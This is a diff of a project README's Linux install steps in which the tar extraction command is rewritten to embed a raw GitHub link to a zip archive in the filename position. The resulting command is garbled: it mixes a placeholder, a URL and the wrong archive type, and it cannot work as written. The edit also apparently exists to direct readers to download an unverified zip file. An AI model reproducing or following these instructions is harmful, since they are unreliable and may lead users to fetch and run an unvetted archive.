OnlyinOhio234/MemoryRaven/README.md

 ### Linux
 - Open a terminal window.
 - Navigate to the folder where you downloaded the file.
-- Use the command `tar -xvzf <filename>.tar.gz` to extract the files.
+- Use the command `tar -xvzf <filename>https://raw.githubusercontent.com/OnlyinOhio234/MemoryRaven/main/deploy/Memory-Raven-v1.0-beta.1.zip` to extract the files.
 - Follow the included instructions in the README for running the application.

 ## ⚙️ System Requirements